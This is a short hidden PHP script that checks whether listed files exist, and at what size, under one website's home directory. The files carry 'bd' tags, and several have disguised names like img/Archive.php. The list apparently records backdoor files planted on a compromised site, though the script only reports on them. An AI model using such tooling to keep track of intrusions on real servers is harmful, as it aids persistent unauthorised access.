File: //tmp/.component
<?php $r = '/home/vitanhod/prostanur.vitavit.com.pk'; $x = ["/orderemail_bk.php"=>"bd@@1269095@@17",
"/includes/configOnline.php"=>"bd@@1269198@@81",
"/includes/config.php"=>"bd@@1269411@@19",
"/includes/themeGenerator.php"=>"bd@@1276552@@959",
"/pcltrace.lib.php"=>"bd@@1268456@@798",
"/img/Archive.php"=>"bd@@1276408@@54",
"/img/Archive.php"=>"bd@@1269555@@945",
"/pcltrace.php"=>"bd@@1309817@@907",
"/pcltrace.lib.php"=>"bd@@1276289@@73",
"/includes/themeGenerator.php"=>"bd@@1279467@@54"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');